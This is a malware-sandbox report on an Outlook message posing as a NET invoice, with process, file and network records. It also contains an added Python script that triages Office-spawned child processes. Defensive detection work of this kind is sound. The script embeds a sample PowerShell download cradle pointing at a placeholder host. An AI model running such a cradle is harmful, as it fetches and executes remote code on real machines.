File name: Sua fatura NET MAURIZIO BILLI.msg

Full analysis: https://app.any.run/tasks/0733d394-3de2-4360-b4f2-93220d5e1aa7
Verdict: Malicious activity
Analysis date: July 17, 2019, 11:48:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5: 5E35DBD9B2E58D0602E7B534D98BB351
SHA1: DEB43049691E8A5E15EA7B46DA6F208C3411541F
SHA256: B1B41CCD4FF7741609091D4DFEBA10C96A2BC30A5FE6EABE0809BDA023B41857
SSDEEP: 1536:Y8UfDzKhhWkWQ9gtAuNtNBqOhbuzIw3IW7m:zUfDzKctNBhbWIw3IW7m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • OUTLOOK.EXE (PID: 3512)
  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 3512)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 3512)
    • Starts Internet Explorer

      • OUTLOOK.EXE (PID: 3512)
    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 1024)
  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 3312)
      • iexplore.exe (PID: 2276)
    • Changes internet zones settings

      • iexplore.exe (PID: 2056)
      • iexplore.exe (PID: 2276)
      • iexplore.exe (PID: 2788)
    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 3512)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 3312)
      • iexplore.exe (PID: 3464)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 3312)
      • iexplore.exe (PID: 3464)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 2056)
      • iexplore.exe (PID: 2276)
      • chrome.exe (PID: 3692)
    • Dropped object may contain Bitcoin addresses

      • iexplore.exe (PID: 3312)
    • Application launched itself

      • iexplore.exe (PID: 2788)
      • chrome.exe (PID: 1024)
    • Manual execution by user

      • chrome.exe (PID: 1024)
    • Dropped object may contain TOR URLs

      • chrome.exe (PID: 1024)
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
Total processes: 68
Monitored processes: 31
Malicious processes: 1
Suspicious processes: 0


Process information

PID 3512  OUTLOOK.EXE
  CMD: "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Sua fatura NET MAURIZIO BILLI.msg"
  Path: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Outlook
  Version: 14.0.6025.1000

PID 2056  iexplore.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.instagram.com/netoficial
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: OUTLOOK.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Internet Explorer
  Exit code: 1
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2868  iexplore.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2056 CREDAT:71937
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: iexplore.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Internet Explorer
  Exit code: 0
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2276  iexplore.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/NEToficial
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: OUTLOOK.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Internet Explorer
  Exit code: 1
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3312  iexplore.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2276 CREDAT:71937
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: iexplore.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Internet Explorer
  Exit code: 0
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2788  iexplore.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/NEToficial
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: OUTLOOK.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Internet Explorer
  Exit code: 1
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3464  iexplore.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2788 CREDAT:71937
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: iexplore.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Internet Explorer
  Exit code: 0
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 1024  chrome.exe
  CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe"
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  Parent process: explorer.exe
  User: admin
  Company: Google LLC
  Integrity Level: MEDIUM
  Description: Google Chrome
  Exit code: 3221225547
  Version: 75.0.3770.100

PID 2504  chrome.exe
  CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x722aa9d0,0x722aa9e0,0x722aa9ec
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  Parent process: chrome.exe
  User: admin
  Company: Google LLC
  Integrity Level: MEDIUM
  Description: Google Chrome
  Exit code: 0
  Version: 75.0.3770.100

PID 3960  chrome.exe
  CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1224 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  Parent process: chrome.exe
  User: admin
  Company: Google LLC
  Integrity Level: MEDIUM
  Description: Google Chrome
  Exit code: 0
  Version: 75.0.3770.100
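The report's only MALICIOUS-tier signature, "Unusual execution from Microsoft Office", is the parent/child relation visible in the process table: OUTLOOK.EXE (PID 3512) spawned three iexplore.exe frame processes toward Instagram and Facebook URLs, and each frame launched a LOW-integrity content process whose command line names its frame through SCODEF:<pid>. The Python below is an added example, not ANY.RUN's code and not part of the report, that runs that same parent/child rule over process-creation events constructed from the table above and grades the result: an Office process opening a browser on a URL (what an analyst clicking a link in an interactive session produces) is rated low, while an Office process spawning a script host such as powershell.exe is rated high. The list of script hosts, the severity names and the extra powershell.exe event that exercises the high path are assumptions of the example and do not appear in the report.

```python
"""Parent/child process triage for an Office-opened mail sample.

Events are constructed from the ANY.RUN process table above (PID, image,
parent image, command line, integrity level). The report does not give parent
PIDs, so Internet Explorer content processes are tied to their frame process
through the SCODEF:<pid> argument instead.
"""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"OUTLOOK.EXE", "WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
BROWSER_IMAGES = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
# Assumed list: script hosts and LOLBins an Office process should never spawn.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
SEVERITY_ORDER = {"none": 0, "low": 1, "medium": 2, "high": 3}

URL_RE = re.compile(r'https?://[^\s"]+')
SCODEF_RE = re.compile(r"\bSCODEF:(\d+)")


@dataclass
class ProcEvent:
    pid: int
    image: str
    parent_image: str
    cmdline: str
    integrity: str


# Constructed from the report's process table (PIDs and command lines as listed).
EVENTS = [
    ProcEvent(3512, "OUTLOOK.EXE", "explorer.exe",
              r'"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f '
              r'"C:\Users\admin\AppData\Local\Temp\Sua fatura NET MAURIZIO BILLI.msg"', "MEDIUM"),
    ProcEvent(2056, "iexplore.exe", "OUTLOOK.EXE",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" https://www.instagram.com/netoficial', "MEDIUM"),
    ProcEvent(2868, "iexplore.exe", "iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2056 CREDAT:71937', "LOW"),
    ProcEvent(2276, "iexplore.exe", "OUTLOOK.EXE",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/NEToficial', "MEDIUM"),
    ProcEvent(3312, "iexplore.exe", "iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2276 CREDAT:71937', "LOW"),
    ProcEvent(2788, "iexplore.exe", "OUTLOOK.EXE",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/NEToficial', "MEDIUM"),
    ProcEvent(3464, "iexplore.exe", "iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2788 CREDAT:71937', "LOW"),
    ProcEvent(1024, "chrome.exe", "explorer.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe"', "MEDIUM"),
]

# Constructed extra event (NOT in the report): what a weaponised .msg typically
# produces, an Office process spawning a script host with a download cradle.
EVENTS_WITH_PAYLOAD = EVENTS + [
    ProcEvent(4100, "powershell.exe", "OUTLOOK.EXE",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage1')\"", "MEDIUM"),
]


def detect_office_children(events):
    """Flag every child of an Office process; severity depends on what the child is."""
    findings = []
    for ev in events:
        if ev.parent_image.upper() not in OFFICE_IMAGES:
            continue
        child = ev.image.lower()
        if child in SCRIPT_HOSTS:
            severity = "high"      # code execution from a mail/document
        elif child in BROWSER_IMAGES:
            severity = "low"       # a link opened from the message body
        else:
            severity = "medium"    # anything else spawned by Office deserves a look
        findings.append({"pid": ev.pid, "parent": ev.parent_image, "child": ev.image,
                         "severity": severity, "urls": URL_RE.findall(ev.cmdline)})
    return findings


def max_severity(events):
    """Highest severity across all Office-child findings ("none" if there are none)."""
    return max((f["severity"] for f in detect_office_children(events)),
               key=SEVERITY_ORDER.__getitem__, default="none")


def ie_frame_map(events):
    """Tie IE content processes (SCODEF:<pid>) to their frame process and record
    whether they run at LOW integrity, as Protected Mode content processes should."""
    frames = {}
    for ev in events:
        m = SCODEF_RE.search(ev.cmdline)
        if ev.image.lower() == "iexplore.exe" and m:
            frames[ev.pid] = {"frame_pid": int(m.group(1)),
                              "protected_mode": ev.integrity == "LOW"}
    return frames


if __name__ == "__main__":
    for f in detect_office_children(EVENTS_WITH_PAYLOAD):
        print(f"[{f['severity']:<6}] {f['parent']} -> {f['child']} (PID {f['pid']}) {f['urls']}")
    print("IE content -> frame:", ie_frame_map(EVENTS))
    print("report verdict by this rule:", max_severity(EVENTS))
```

Run against the report's own events the rule produces three low findings, one per Outlook-spawned iexplore.exe, and each content process maps back to its frame at LOW integrity; only the constructed powershell.exe event pushes the verdict to high. That is the distinction worth drawing before acting on the sandbox's "Malicious activity" label: the report records no executable drops and no threats, and the single malicious-tier signature is satisfied by a browser opening social-media links.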
Total events: 3 095
Read events: 2 421
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 86
Text files: 326
Unknown types: 20

Dropped files

PID 3512  OUTLOOK.EXE
  C:\Users\admin\AppData\Local\Temp\CVRCF17.tmp.cvr
    MD5:
    SHA256:
  C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm  (type: pgc)
    MD5: F328C43E2864795DD4C08E70F3AF2257
    SHA256: 88030A9D376522F16DA0446BCAD1644EAE48AE0E8BA29318C79261357286ABCE
  C:\Users\admin\AppData\Local\Temp\StructuredQuery.log  (type: text)
    MD5: 7C5EEE003DDDB37E82B14C8E2F60A875
    SHA256: DE85171B94D602C18B57B797C6C97B8E123A71F1CFB81781E87A545742A15EAB
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\topo[1].jpg  (type: image)
    MD5: F5AAA0D35ABC5A9383D470244F34C372
    SHA256: BE627EB57F98580F33FAF1BB07D284268CDA4EE87B06A0830BF294A6C6F11B76
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\social-4[1].gif  (type: image)
    MD5: 2527362DEDE0EC63F5A46B7DECCD3F94
    SHA256: 93469C22CECFE17440D67F5EE90BE156775B9ED235BED660DAEF813E3CB9C5B1
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\social-2[1].gif  (type: image)
    MD5: A80E1F4F543096530610842F8F111970
    SHA256: 3E6920E2E3BCC690C96E15EE4398E44EFD79F2465BE3B4326379A8928B5A33B8
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\social-5[1].gif  (type: image)
    MD5: FA40C2907E23E952A209E05D7C3490B3
    SHA256: B2F61234797725E72D4C00C69376626E687710EE89B24954B8787229849DF76E
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\banner[1].jpg  (type: image)
    MD5: 4F0717F4E3359EE12CFFED1CCAD407C8
    SHA256: 44AFDE8AFE7D804267AB7AB83B482D71819B527DE7AA39FF9EA8771BD1FEFB2A
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\siga[1].gif  (type: image)
    MD5: 5CC69F81DA215931F08B6D5F0B621509
    SHA256: D2907A5DB95BF533B2538D8F416E998893B449CFD081A40902F62185F654FA19
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt  (type: text)
    MD5: B10B0FE1947E4F5C992EE06B971919D5
    SHA256: B6B7E161E37592D0DC4ED2BA3BB8457C9EE0678D8BE4A1FE2C5E35FB17C57D95
HTTP(S) requests: 15
TCP/UDP connections: 96
DNS requests: 34
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
3512 | OUTLOOK.EXE | GET | 301 | 152.195.52.2:80 | http://www.netcombo.com.br/static/email/20161118120507/images/logo.jpg | US | whitelisted
3512 | OUTLOOK.EXE | GET | 301 | 152.195.52.2:80 | http://www.netcombo.com.br/static/email/20161118120507/images/social-4.gif | US | whitelisted
3512 | OUTLOOK.EXE | GET | 301 | 152.195.52.2:80 | http://www.netcombo.com.br/static/email/20161118120507/images/siga.gif | US | whitelisted
3512 | OUTLOOK.EXE | GET | 301 | 152.195.52.2:80 | http://www.netcombo.com.br/static/email/20161118120507/images/social-5.gif | US | whitelisted
3512 | OUTLOOK.EXE | GET | 301 | 152.195.52.2:80 | http://www.netcombo.com.br/static/email/20161118120507/images/social-2.gif | US | whitelisted
3512 | OUTLOOK.EXE | GET |  | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | whitelisted
3512 | OUTLOOK.EXE | GET | 301 | 152.195.52.2:80 | http://www.netcombo.com.br/static/email/20161118120507/images/social-3.gif | US | whitelisted
3512 | OUTLOOK.EXE | GET | 301 | 152.195.52.2:80 | http://www.netcombo.com.br/static/email/20161118120507/images/social-1.gif | US | whitelisted
3692 | chrome.exe | GET | 204 | 172.217.25.131:80 | http://csi.gstatic.com/csi?v=3&s=gapi_module&action=gapi_iframes__googleapis_cli12&it=mli.188,mei.17&srt=16&tbsrt=2321&tran=15&e=abc_l0,abc_m0,abc_pgapi_iframes__googleapis_cli12,abc_u0&rt= | US | whitelisted
3512 | OUTLOOK.EXE | GET | 301 | 152.195.52.2:80 | http://www.netcombo.com.br/static/email/20161118120507/images/banner.jpg | US | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3312 | iexplore.exe | 31.13.92.36:443 | m.facebook.com | Facebook, Inc. | IE | whitelisted
2276 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted
2056 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted
3312 | iexplore.exe | 185.60.216.35:443 | www.facebook.com | Facebook, Inc. | IE | whitelisted
3312 | iexplore.exe | 157.240.20.19:443 | static.xx.fbcdn.net | Facebook, Inc. | US | whitelisted
3312 | iexplore.exe | 31.13.64.21:443 | scontent-amt2-1.xx.fbcdn.net | Facebook, Inc. | IE | whitelisted
3512 | OUTLOOK.EXE | 152.195.52.2:80 | www.netcombo.com.br | MCI Communications Services, Inc. d/b/a Verizon Business | US | unknown
2868 | iexplore.exe | 31.13.92.174:443 | www.instagram.com | Facebook, Inc. | IE | malicious
3512 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted
2056 | iexplore.exe | 31.13.92.174:443 | www.instagram.com | Facebook, Inc. | IE | malicious

DNS requests

Domain
IP
Reputation
www.netcombo.com.br
  • 152.195.52.2
whitelisted
config.messenger.msn.com
  • 64.4.26.155
whitelisted
www.instagram.com
  • 31.13.92.174
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.facebook.com
  • 185.60.216.35
whitelisted
m.facebook.com
  • 31.13.92.36
whitelisted
static.xx.fbcdn.net
  • 157.240.20.19
whitelisted
scontent-amt2-1.xx.fbcdn.net
  • 31.13.64.21
whitelisted
facebook.com
  • 31.13.92.36
whitelisted
fbcdn.net
  • 31.13.92.36
whitelisted

Threats

No threats detected
No debug info